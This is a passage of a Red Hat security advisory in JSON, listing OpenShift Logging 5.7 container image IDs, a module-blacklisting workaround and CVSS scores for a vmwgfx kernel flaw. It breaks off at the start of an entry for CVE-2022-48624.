"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"category": "workaround",
"details": "To mitigate this issue, it is possible to prevent the affected code from being loaded by blacklisting the vmwgfx kernel module. For instructions relating to blacklisting a kernel module, please see https://access.redhat.com/solutions/41278.",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query"
},
{
"cve": "CVE-2022-48624",
"cwe": {
"id": "CWE-77",
"name": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)"
},
"discovery_date": "2024-02-20T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2265081"
}
],
"notes": [
{
"category": "description",
